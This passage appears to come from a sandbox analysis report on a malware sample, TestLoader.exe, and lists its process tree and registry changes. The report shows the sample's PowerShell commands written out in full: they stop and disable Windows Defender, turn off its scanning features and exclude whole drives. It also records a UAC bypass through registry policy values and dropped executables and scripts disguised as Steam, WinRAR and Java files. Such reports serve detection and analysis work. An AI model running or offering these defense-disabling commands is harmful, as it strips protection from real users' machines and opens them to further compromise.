PID 8 wrote to memory of 1296	8	TestLoader.exe	90
PID 8 wrote to memory of 1296	8	TestLoader.exe	90
PID 8 wrote to memory of 804	8	TestLoader.exe	93
PID 8 wrote to memory of 804	8	TestLoader.exe	93
PID 8 wrote to memory of 4632	8	TestLoader.exe	95
PID 8 wrote to memory of 4632	8	TestLoader.exe	95
PID 8 wrote to memory of 1104	8	TestLoader.exe	97
PID 8 wrote to memory of 1104	8	TestLoader.exe	97
PID 8 wrote to memory of 4112	8	TestLoader.exe	99
PID 8 wrote to memory of 4112	8	TestLoader.exe	99
PID 8 wrote to memory of 2028	8	TestLoader.exe	101
PID 8 wrote to memory of 2028	8	TestLoader.exe	101
PID 8 wrote to memory of 2852	8	TestLoader.exe	103
PID 8 wrote to memory of 2852	8	TestLoader.exe	103
PID 8 wrote to memory of 4940	8	TestLoader.exe	105
PID 8 wrote to memory of 4940	8	TestLoader.exe	105
PID 8 wrote to memory of 3260	8	TestLoader.exe	108
PID 8 wrote to memory of 3260	8	TestLoader.exe	108
PID 8 wrote to memory of 3392	8	TestLoader.exe	111
PID 8 wrote to memory of 3392	8	TestLoader.exe	111
PID 8 wrote to memory of 3336	8	TestLoader.exe	113
PID 8 wrote to memory of 3336	8	TestLoader.exe	113
PID 8 wrote to memory of 5096	8	TestLoader.exe	115
PID 8 wrote to memory of 5096	8	TestLoader.exe	115
PID 8 wrote to memory of 2444	8	TestLoader.exe	117
PID 8 wrote to memory of 2444	8	TestLoader.exe	117
PID 8 wrote to memory of 2960	8	TestLoader.exe	119
PID 8 wrote to memory of 2960	8	TestLoader.exe	119
PID 8 wrote to memory of 1300	8	TestLoader.exe	121
PID 8 wrote to memory of 1300	8	TestLoader.exe	121
PID 8 wrote to memory of 752	8	TestLoader.exe	123
PID 8 wrote to memory of 752	8	TestLoader.exe	123
PID 8 wrote to memory of 4620	8	TestLoader.exe	125
PID 8 wrote to memory of 4620	8	TestLoader.exe	125
PID 8 wrote to memory of 3644	8	TestLoader.exe	127
PID 8 wrote to memory of 3644	8	TestLoader.exe	127
PID 8 wrote to memory of 2676	8	TestLoader.exe	129
PID 8 wrote to memory of 2676	8	TestLoader.exe	129
PID 8 wrote to memory of 4956	8	TestLoader.exe	131
PID 8 wrote to memory of 4956	8	TestLoader.exe	131
PID 8 wrote to memory of 1552	8	TestLoader.exe	133
PID 8 wrote to memory of 1552	8	TestLoader.exe	133
PID 8 wrote to memory of 1872	8	TestLoader.exe	135
PID 8 wrote to memory of 1872	8	TestLoader.exe	135
PID 8 wrote to memory of 1704	8	TestLoader.exe	137
PID 8 wrote to memory of 1704	8	TestLoader.exe	137
PID 8 wrote to memory of 2404	8	TestLoader.exe	140
PID 8 wrote to memory of 2404	8	TestLoader.exe	140
PID 8 wrote to memory of 4624	8	TestLoader.exe	142
PID 8 wrote to memory of 4624	8	TestLoader.exe	142
PID 8 wrote to memory of 4436	8	TestLoader.exe	146
PID 8 wrote to memory of 4436	8	TestLoader.exe	146
PID 8 wrote to memory of 4104	8	TestLoader.exe	148
PID 8 wrote to memory of 4104	8	TestLoader.exe	148
PID 8 wrote to memory of 4116	8	TestLoader.exe	150
PID 8 wrote to memory of 4116	8	TestLoader.exe	150
PID 8 wrote to memory of 1732	8	TestLoader.exe	152
PID 8 wrote to memory of 1732	8	TestLoader.exe	152
PID 8 wrote to memory of 4156	8	TestLoader.exe	154
PID 8 wrote to memory of 4156	8	TestLoader.exe	154
PID 8 wrote to memory of 2680	8	TestLoader.exe	156
PID 8 wrote to memory of 2680	8	TestLoader.exe	156

System policy modification 1 TTPs 6 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	SteamWebClient.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	System.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	System.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\TestLoader.exe
"C:\Users\Admin\AppData\Local\Temp\TestLoader.exe"
1⤵
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Windows security bypass
- Downloads MZ/PE file
- Checks computer location settings
- Windows security modification
- Adds Run key to start application
- Modifies WinLogon
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:8
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Stop-Service WinDefend -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1692
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-Service WinDefend -StartupType Disabled" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "New-ItemProperty -Path 'HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend' -Name 'Start' -Value 4 -PropertyType DWord -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Windows' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4112
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2852
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\SkillProtect' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3260
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3392
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableBehaviorMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3336
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableBlockAtFirstSeen $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableIOAVProtection $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2444
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisablePrivacyMode $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1300
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableArchiveScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:752
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableScriptScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3644
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -SubmitSamplesConsent 2 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -MAPSReporting 0 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4956
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -HighThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -LowThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1704
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -SevereThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2404
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -EnableControlledFolderAccess Disabled -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4624
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Windows' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4104
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4116
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1732
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\Users' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4156
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Add-MpPreference -ExclusionPath 'C:\SkillProtect' -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2680
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableRealtimeMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3144
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableBehaviorMonitoring $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:5084
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableBlockAtFirstSeen $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableIOAVProtection $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4436
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisablePrivacyMode $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:804
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableArchiveScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4280
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableIntrusionPreventionSystem $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3796
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -DisableScriptScanning $true -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:4032
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -SubmitSamplesConsent 2 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -MAPSReporting 0 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3308
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -HighThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1620
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -LowThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -SevereThreatDefaultAction 6 -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:2520
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -Command "Set-MpPreference -EnableControlledFolderAccess Disabled -Force" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:3728
- C:\Program Files\WinRar\RarExtPackage.exe
  "C:\Program Files\WinRar\RarExtPackage.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4344
- C:\Program Files\Java\CustomJavaSC.exe
  "C:\Program Files\Java\CustomJavaSC.exe"
  2⤵
  - Executes dropped EXE
  PID:1984
- C:\Program Files\RUXIM\sihost.exe
  "C:\Program Files\RUXIM\sihost.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
  PID:2096
- - C:\Users\Admin\AppData\Roaming\Steam\SteamWebHelper.exe
    "C:\Users\Admin\AppData\Roaming\Steam\SteamWebHelper.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of AdjustPrivilegeToken
    PID:3124
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Steam\JdNzo6aXzPz4ZVLaHlpQ.vbe"
    3⤵
    - Checks computer location settings
    PID:2964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\1964hQskJhjU.bat" "
      4⤵
      PID:1544
    - - C:\Users\Admin\AppData\Roaming\Steam\SteamWebClient.exe
        
        "C:\Users\Admin\AppData\Roaming\Steam\SteamWebClient.exe"
        5⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Drops file in Program Files directory
        Drops file in Windows directory
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        System policy modification
        
        PID:3020
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1956
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2852
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4632
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4472
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2444
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4832
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3908
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4336
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2380
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1060
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:5056
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\y7gOE9huL6.bat"
        6⤵
        
        PID:4612
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        7⤵
        
        PID:3692
        
        C:\Recovery\WindowsRE\System.exe
        
        "C:\Recovery\WindowsRE\System.exe"
        7⤵
        UAC bypass
        Checks computer location settings
        Executes dropped EXE
        Checks whether UAC is enabled
        Modifies registry class
        System policy modification
        
        PID:2788
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\82d1cc99-126a-4c23-9478-585c5f39459a.vbs"
        8⤵
        
        PID:4756
        
        C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\aae92497-a8bf-4a46-b954-118799a755a2.vbs"
        8⤵
        
        PID:4116

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7QTUyREE0NzMtMUY0MC00OUQyLUIzQzYtQzNEODRFQzJBMDRFfSIgdXNlcmlkPSJ7REM1OTYwMjctQ0VBRS00N0I5LUI1NTQtOTZCOTdDREUxMzg0fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7MjcyMkU1QUQtODk4MS00QUYyLUFCNDctMUUwMDQ2OTlFMjg1fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIxIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDU5ODUiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxODQ0NDQzNjAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWN